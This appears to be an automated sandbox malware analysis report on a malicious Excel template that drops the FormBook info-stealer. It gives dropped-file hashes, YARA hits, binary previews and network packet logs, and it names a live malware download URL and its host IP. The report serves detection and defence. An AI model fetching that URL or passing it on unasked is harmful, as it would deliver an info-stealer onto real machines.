                                                19:48:46API Interceptor230x Sleep call for process: tynex.exe modified
                                                19:49:18API Interceptor92x Sleep call for process: FB_C479.tmp.exe modified
                                                19:49:43API Interceptor221x Sleep call for process: cscript.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                160.153.129.234New order.xltxGet hashmaliciousBrowse
                                                • inter-trading-service.com/id3T/ConsoleApp14.exe

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                inter-trading-service.comNew order.xltxGet hashmaliciousBrowse
                                                • 160.153.129.234

                                                ASN

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                GODADDY-AMSDEORIGINAL PROFORMA INVOICE COAU7220898130,PDF.exeGet hashmaliciousBrowse
                                                • 160.153.136.3
                                                Purchase Requirements.exeGet hashmaliciousBrowse
                                                • 160.153.136.3
                                                New order.xltxGet hashmaliciousBrowse
                                                • 160.153.129.234
                                                statement.exeGet hashmaliciousBrowse
                                                • 160.153.246.81
                                                Purchase Requirements.exeGet hashmaliciousBrowse
                                                • 160.153.136.3
                                                Invoice no SS21-22185.exeGet hashmaliciousBrowse
                                                • 160.153.246.81
                                                i9Na8iof4G.exeGet hashmaliciousBrowse
                                                • 160.153.136.3
                                                2129-20 30% CLAIM - PO SPO21-01-072.exeGet hashmaliciousBrowse
                                                • 160.153.16.6
                                                AMxAyl1FvN.docGet hashmaliciousBrowse
                                                • 160.153.208.149
                                                M7ZGK4fBfl.exeGet hashmaliciousBrowse
                                                • 160.153.136.3
                                                altnp3zI5hfg3Eg.exeGet hashmaliciousBrowse
                                                • 160.153.136.3
                                                gqdJ6f9axq.exeGet hashmaliciousBrowse
                                                • 160.153.136.3
                                                YaRh8PG41y.exeGet hashmaliciousBrowse
                                                • 160.153.136.3
                                                2129-20 30% CLAIM - PO SPO21-01-072.exeGet hashmaliciousBrowse
                                                • 160.153.16.6
                                                Invoice #210722 14,890 $.exeGet hashmaliciousBrowse
                                                • 160.153.136.3
                                                SCAN_Wells Fargo bank payment.exeGet hashmaliciousBrowse
                                                • 160.153.133.86
                                                PO.exeGet hashmaliciousBrowse
                                                • 160.153.246.81
                                                4bTTNoUZaa.exeGet hashmaliciousBrowse
                                                • 160.153.136.3
                                                Inv_7623980.exeGet hashmaliciousBrowse
                                                • 160.153.136.3
                                                lono.exeGet hashmaliciousBrowse
                                                • 160.153.136.3

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exeIMG_105_13_676_571.exeGet hashmaliciousBrowse
                                                  SecuriteInfo.com.Trojan.DownloaderNET.151.21045.exeGet hashmaliciousBrowse
                                                    4-1.docGet hashmaliciousBrowse
                                                      Order Inqury-93-23-20.docGet hashmaliciousBrowse
                                                        IMG_7189012.exeGet hashmaliciousBrowse
                                                          SecuriteInfo.com.Trojan.GenericKD.45131634.12155.exeGet hashmaliciousBrowse
                                                            77.docGet hashmaliciousBrowse
                                                              qlvti.exeGet hashmaliciousBrowse
                                                                RFQ-220818.xlsGet hashmaliciousBrowse
                                                                  RFQ-220818.xlsGet hashmaliciousBrowse

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\New_1007572_021[1].exe
                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:downloaded
                                                                    Size (bytes):455168
                                                                    Entropy (8bit):7.937198220453206
                                                                    Encrypted:false
                                                                    SSDEEP:12288:bHOWiWyFfGU94mxuYfv/PT9WK+dG7VWfQTB:bHQ4mF7ZBMfwB
                                                                    MD5:41137FD61B9CC0D92225C91660A5902C
                                                                    SHA1:15D023FD6D344CB18243469A3EE01FEA6BB189AF
                                                                    SHA-256:B04306FA8223C20A1ABAAA6AEB5CABB2A83DC04337BEB2ACFD47784B34B682BC
                                                                    SHA-512:E32EE01FD957EE49F6BFCEFF4BC58B8B695111EF7416F8487398CBFAFD16B2EEAE0B79C41A8071075FD4E09D584CB642393F9E1655A5D70AB3135ADDD2E7ECBA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 28%
                                                                    Reputation:low
                                                                    IE Cache URL:http://inter-trading-service.com/Di4/New_1007572_021.exe
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ms)...............0......J........... ........@.. .......................`............@.................................@...K........F...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc....F.......H..................@..@.reloc.......@......................@..B................p.......H........<...,......,....i..,\...........................................0..>........(.... ....~....:....&8....8........E........8.....(....8....*...s....o....*.0..}.......8m.......E....[.......8V....{....(....8....8....8......(.... ....~c...9....&8.....{....9.... ....~2...:....&8....*.:....8........0..........8........E............n.......8......(....8......(....8'...........s....(.... ....~K...9....&8..... .... ....s....(.... ....~t...:....&8y....r...p(....8.....(....8.....
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\30DB366F.jpg
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1, orientation=upper-left], baseline, precision 8, 609x63, frames 3
                                                                    Category:modified
                                                                    Size (bytes):11345
                                                                    Entropy (8bit):7.599470125749675
                                                                    Encrypted:false
                                                                    SSDEEP:192:vPgndNBA4fwufvCYv17N+4exvNEJns295+QEwMWdUDV+yiy3rMB4Lz:vPgndE4f7CG17N+VuJsC5+jwMOWYBmz
                                                                    MD5:CF0E4D3B831F90332E0B61C6EC21B354
                                                                    SHA1:1E2DD6780419B138AD9FC2C45B84A51ABC2D6347
                                                                    SHA-256:FDE032888013EA6CC6D652DBECC1F357F8204A5327C78E84D01057024F956B76
                                                                    SHA-512:FCE0305E018D7BBB36E64468160894B5BECFCE20FA1EB8521333ECCE42FA850E788680D59C187D1F0B10C9198FBF7A616B2B7D56D66392E916FA2AC3B0CEBA95
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview: ......JFIF.....`.`....."Exif..MM.*.........................C....................................................................C.......................................................................?.a.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?............W........:.?...+.MB_.E..<Q.?.F|5.j.|...p.8.Kc.8......R.<+}..r.zM....XX..._..As.F>P{......qI.....>..UNN.9...^... ?................W..K.....1~..o.....y....i..*..S..1X......U.*FW'....|Vo...MRX...M,.C..T1..J.s..<s..)A.Gue.u2.E)...O.o.6...../.......Z?.oO...........-}A..z.?...|.z......p...._.s..g.................../.
                                                                    C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exe
                                                                    Process:C:\Users\user\AppData\Local\Temp\tynex.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):3072
                                                                    Entropy (8bit):1.7089931293899303
                                                                    Encrypted:false
                                                                    SSDEEP:24:7U6Id6l1iWyyyyyyyyytrUUUUUUUUUUgro:oO
                                                                    MD5:74BAFB3E707C7B0C63938AC200F99C7F
                                                                    SHA1:10C5506337845ED9BF25C73D2506F9C15AB8E608
                                                                    SHA-256:129450BA06AD589CF6846A455A5B6B5F55E164EE4906E409EB692AB465269689
                                                                    SHA-512:5B24DC5ACD14F812658E832B587B60695FB16954FCA006C2C3A7382EF0EC65C3BD1AAF699425C49FF3CCEEF16869E75DD6F00EC189B9F673F08F7E1B80CF7781
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: Metadefender, Detection: 5%, Browse
                                                                    • Antivirus: ReversingLabs, Detection: 2%
                                                                    Joe Sandbox View:
                                                                    • Filename: IMG_105_13_676_571.exe, Detection: malicious, Browse
                                                                    • Filename: SecuriteInfo.com.Trojan.DownloaderNET.151.21045.exe, Detection: malicious, Browse
                                                                    • Filename: 4-1.doc, Detection: malicious, Browse
                                                                    • Filename: Order Inqury-93-23-20.doc, Detection: malicious, Browse
                                                                    • Filename: IMG_7189012.exe, Detection: malicious, Browse
                                                                    • Filename: SecuriteInfo.com.Trojan.GenericKD.45131634.12155.exe, Detection: malicious, Browse
                                                                    • Filename: 77.doc, Detection: malicious, Browse
                                                                    • Filename: qlvti.exe, Detection: malicious, Browse
                                                                    • Filename: RFQ-220818.xls, Detection: malicious, Browse
                                                                    • Filename: RFQ-220818.xls, Detection: malicious, Browse
                                                                    Preview: MZl.....................@.......Win32 Program!..$......!.L.!`...GoLink, GoAsm www.GoDevTool.com.PE..L....y.>..........................................@..........................0......C................................................ ..............................................................................................................code................................ ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe
                                                                    Process:C:\Users\user\AppData\Local\Temp\tynex.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):186368
                                                                    Entropy (8bit):7.314572114292142
                                                                    Encrypted:false
                                                                    SSDEEP:3072:4dqYxe9j7g+D8OwXoopyPS5O1lFqRKMhZ6L7Ne61PCbyl2:4kXh8OIoYyq5ILqRKMo7cFN
                                                                    MD5:48ECE2CA39A9EAE7FCED7418CF071D46
                                                                    SHA1:7570995CBF699088A8F208015CB2C92BE5BC837A
                                                                    SHA-256:4119B29BC938578D5D243DB714D0619228D37C10CCAA52925F9E81A410720D59
                                                                    SHA-512:E897FDED4B643054796E410CADCC348C1215C934FE70F5407E36E9F10E59E2B10B7EDCBB99D746709AEF8FF498D98D848ADA90FB477EA732A128EE138ED0FD3B
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe, Author: JPCERT/CC Incident Response Group
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: Metadefender, Detection: 49%, Browse
                                                                    • Antivirus: ReversingLabs, Detection: 86%
                                                                    Preview: MZER.....X......<......(..............................................!..L.!This program cannot be run in DOS mode....$............f..f..f......f......f......f.Rich.f.................PE..L.....N..........................................@.......................................@..........................................................................................................................................................text............................... ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Local\Temp\tynex.exe
                                                                    Process:C:\Users\Public\tynex.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):455168
                                                                    Entropy (8bit):7.937198220453206
                                                                    Encrypted:false
                                                                    SSDEEP:12288:bHOWiWyFfGU94mxuYfv/PT9WK+dG7VWfQTB:bHQ4mF7ZBMfwB
                                                                    MD5:41137FD61B9CC0D92225C91660A5902C
                                                                    SHA1:15D023FD6D344CB18243469A3EE01FEA6BB189AF
                                                                    SHA-256:B04306FA8223C20A1ABAAA6AEB5CABB2A83DC04337BEB2ACFD47784B34B682BC
                                                                    SHA-512:E32EE01FD957EE49F6BFCEFF4BC58B8B695111EF7416F8487398CBFAFD16B2EEAE0B79C41A8071075FD4E09D584CB642393F9E1655A5D70AB3135ADDD2E7ECBA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 28%
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ms)...............0......J........... ........@.. .......................`............@.................................@...K........F...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc....F.......H..................@..@.reloc.......@......................@..B................p.......H........<...,......,....i..,\...........................................0..>........(.... ....~....:....&8....8........E........8.....(....8....*...s....o....*.0..}.......8m.......E....[.......8V....{....(....8....8....8......(.... ....~c...9....&8.....{....9.... ....~2...:....&8....*.:....8........0..........8........E............n.......8......(....8......(....8'...........s....(.... ....~K...9....&8..... .... ....s....(.... ....~t...:....&8y....r...p(....8.....(....8.....
                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\New_1007572_021.LNK
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:18 2020, mtime=Wed Aug 26 14:08:18 2020, atime=Wed Aug 4 01:48:37 2021, length=18379, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):2088
                                                                    Entropy (8bit):4.507709111934133
                                                                    Encrypted:false
                                                                    SSDEEP:48:8LM/XT0ZVXbRrKl4Qh2LM/XT0ZVXbRrKl4Q/:8LM/XuVXbF+4Qh2LM/XuVXbF+4Q/
                                                                    MD5:77BC4104B953DB292FAAEF9200B0C23C
                                                                    SHA1:3F637A9400B4CE8E8214A5D2F390DB06ED2EA869
                                                                    SHA-256:5859B1E88CDCCC883D47F0C513CA3CFFE2669992F13CC970EDBCCD17E0DA0332
                                                                    SHA-512:DFD81A20411DE7A6F95456B59A6EA2DE1917C76DFEC5448ED81B99BD4483AFD90F1DFABF77650704D7D35A1F25C3D03CF49284C080D51012BFE8FD513C37AA5D
                                                                    Malicious:false
                                                                    Preview: L..................F.... .......{......{...<r9....G...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....r.2..G...S.. .NEW_10~1.XLT..V.......Q.y.Q.y*...8.....................N.e.w._.1.0.0.7.5.7.2._.0.2.1...x.l.t.x.......~...............-...8...[............?J......C:\Users\..#...................\\701188\Users.user\Desktop\New_1007572_021.xltx.+.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.N.e.w._.1.0.0.7.5.7.2._.0.2.1...x.l.t.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......701188..........D_....3N...W...9F.C....
                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):85
                                                                    Entropy (8bit):4.185015424439977
                                                                    Encrypted:false
                                                                    SSDEEP:3:HgAedaLUlzKMdaLUlmxWgAedaLUlv:HFeaLUhKkaLU/eaLU1
                                                                    MD5:618EC37A8CDBB18D2CECC9BD1A804D28
                                                                    SHA1:151F4284B4B8D1ABB594107311F9A1147C659623
                                                                    SHA-256:F83CBD16BFFA7ABBEC581821858358C2BF0B3121D681E0543AA8EA83A37A9D37
                                                                    SHA-512:F919566E710C8FF55DA6C28CF1E830614FCDDB09199914917FDE11641A7BEE5992EBC2F59F19861C0158C655A14FECC01FC481D18410768A1AA936DFA84FB57C
                                                                    Malicious:false
                                                                    Preview: [misc]..New_1007572_021.LNK=0..New_1007572_021.LNK=0..[misc]..New_1007572_021.LNK=0..
                                                                    C:\Users\user\Desktop\~$New_1007572_021.xltx
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):165
                                                                    Entropy (8bit):1.4377382811115937
                                                                    Encrypted:false
                                                                    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                    MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                    Malicious:true
                                                                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                    C:\Users\Public\tynex.exe
                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):455168
                                                                    Entropy (8bit):7.937198220453206
                                                                    Encrypted:false
                                                                    SSDEEP:12288:bHOWiWyFfGU94mxuYfv/PT9WK+dG7VWfQTB:bHQ4mF7ZBMfwB
                                                                    MD5:41137FD61B9CC0D92225C91660A5902C
                                                                    SHA1:15D023FD6D344CB18243469A3EE01FEA6BB189AF
                                                                    SHA-256:B04306FA8223C20A1ABAAA6AEB5CABB2A83DC04337BEB2ACFD47784B34B682BC
                                                                    SHA-512:E32EE01FD957EE49F6BFCEFF4BC58B8B695111EF7416F8487398CBFAFD16B2EEAE0B79C41A8071075FD4E09D584CB642393F9E1655A5D70AB3135ADDD2E7ECBA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 28%
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ms)...............0......J........... ........@.. .......................`............@.................................@...K........F...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc....F.......H..................@..@.reloc.......@......................@..B................p.......H........<...,......,....i..,\...........................................0..>........(.... ....~....:....&8....8........E........8.....(....8....*...s....o....*.0..}.......8m.......E....[.......8V....{....(....8....8....8......(.... ....~c...9....&8.....{....9.... ....~2...:....&8....*.:....8........0..........8........E............n.......8......(....8......(....8'...........s....(.... ....~K...9....&8..... .... ....s....(.... ....~t...:....&8y....r...p(....8.....(....8.....

                                                                    Static File Info

                                                                    General

                                                                    File type:Microsoft Excel 2007+
                                                                    Entropy (8bit):7.914902908472318
                                                                    TrID:
                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                    • ZIP compressed archive (8000/1) 16.67%
                                                                    File name:New_1007572_021.xltx
                                                                    File size:18379
                                                                    MD5:427e80f30505c596c822c141283a5a70
                                                                    SHA1:d910f9e9ecf2cb8c68f8fca4121bac4bad757a37
                                                                    SHA256:d1acfa41b1e1fbc076b41547954e6615132256983b0315c50f8dbb97a0399fbd
                                                                    SHA512:b25f13a6d540a4b20796bee8336b187bcb7c3fc9d8f7c04fbadcc7b897a9b4417336356db2134fc5ce4e230f656ff6eb9337edc993b68674d06ef1fe3138876d
                                                                    SSDEEP:384:s+ZSGClB7ap+ogsnXqYvEIl59nWPdLGHT7I+6f+0vNtQX:P9G7czBvEIlbEKz0hFtg
                                                                    File Content Preview:PK........L..S................[Content_Types].xmlUT...>..a>..a>..a.TMO.0..#...\....!....# .? k..[.....{.v...6P..M....e{t.t.X@B.|%...(..A..T...qp%.$....C%V.....d......=VbJ....z.Na."x......152.z.........'.4..!nF.0Q....%..2I`Q.w]`......Z.....;*..B..6..&.....

                                                                    File Icon

                                                                    Icon Hash:ecc2ca8a8cdcce80

                                                                    Static OLE Info

                                                                    General

                                                                    Document Type:OpenXML
                                                                    Number of OLE Files:1

                                                                    OLE File "/opt/package/joesandbox/database/analysis/458850/sample/New_1007572_021.xltx"

                                                                    Indicators

                                                                    Has Summary Info:False
                                                                    Application Name:unknown
                                                                    Encrypted Document:False
                                                                    Contains Word Document Stream:
                                                                    Contains Workbook/Book Stream:
                                                                    Contains PowerPoint Document Stream:
                                                                    Contains Visio Document Stream:
                                                                    Contains ObjectPool Stream:
                                                                    Flash Objects Count:
                                                                    Contains VBA Macros:False

                                                                    Summary

                                                                    Author:Dell
                                                                    Last Saved By:Dell
                                                                    Create Time:2021-04-28T14:40:56Z
                                                                    Last Saved Time:2021-07-29T09:05:14Z
                                                                    Creating Application:Microsoft Excel
                                                                    Security:0

                                                                    Document Summary

                                                                    Thumbnail Scaling Desired:false
                                                                    Company:
                                                                    Contains Dirty Links:false
                                                                    Shared Document:false
                                                                    Changed Hyperlinks:false
                                                                    Application Version:15.0300

                                                                    Streams

                                                                    Stream Path: \x1OlE10NAtiVe, File Type: data, Stream Size: 1644
                                                                    General
                                                                    Stream Path:\x1OlE10NAtiVe
                                                                    File Type:data
                                                                    Stream Size:1644
                                                                    Entropy:7.65247560699
                                                                    Base64 Encoded:False
                                                                    Data ASCII:. . t . . ~ . . G . . . # > ( . . . . . . . . . . . . . . . . . . . . . . . . . . P . E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . D . . . . . . . . . . U . V . . . . . . . . . . . . . { . . . . . . F . . ! . o . 0 . . . . . . b . . . C . . { 1 . . 5 . . . o n , 6 . . . . { . . " h y . B . . ; . . { y . E . . . . p . . . . ? . . l . . . v e . . G . . . . . . K . . ^ . [ . . y I . . . g . . . d . S . f b . k F . T 1 . U . . . . . . h / > . . a / . . . . c . . . r 1 . . . s . . . . N . V
                                                                    Data Raw:a3 16 74 05 03 7e 01 eb 47 0a 01 05 23 3e 28 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 06 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 29 c3 44 00 00 00 00 e9 f9 01 00 00 c5 55 0c 56 05 93 80 99 ee b3 e2 1f 90 09 ef e0 de 7b e4 85 f1 c5 c2 aa 46 b5 92 21 fb 6f 9d 30 16 ac b3 d0 c0 f4 62 eb 82 e8 43

                                                                    Network Behavior

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Aug 3, 2021 19:48:49.125675917 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.153186083 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.153314114 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.153964043 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.182463884 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.187442064 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.187589884 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.189138889 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.189239979 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.190680027 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.190752029 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.191246033 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.191324949 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.192192078 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.192255020 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.192260027 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.192281008 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.192322016 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.192329884 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.192694902 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.192742109 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.192790985 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.193257093 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.193325996 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.207211018 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.214283943 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.214360952 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.214461088 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.214534044 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.215810061 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.215857983 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.215893984 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.217226028 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.217253923 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.217286110 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.217309952 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.218938112 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.218966007 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.218991995 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.219016075 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.219033957 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.219048023 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.219058037 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.219068050 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.219072104 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.219077110 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.219083071 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.219098091 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.219100952 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.219111919 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.219149113 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.222286940 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.223342896 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.223385096 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.223419905 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.223427057 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.223442078 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.223453999 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.223464966 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.223495007 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.226684093 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.229032993 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.234457970 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.234571934 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.240442038 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.240483999 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.240613937 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.240614891 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.240684032 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.242337942 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.242378950 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.242410898 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.242439985 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.243297100 CEST8049165160.153.129.234192.168.2.22
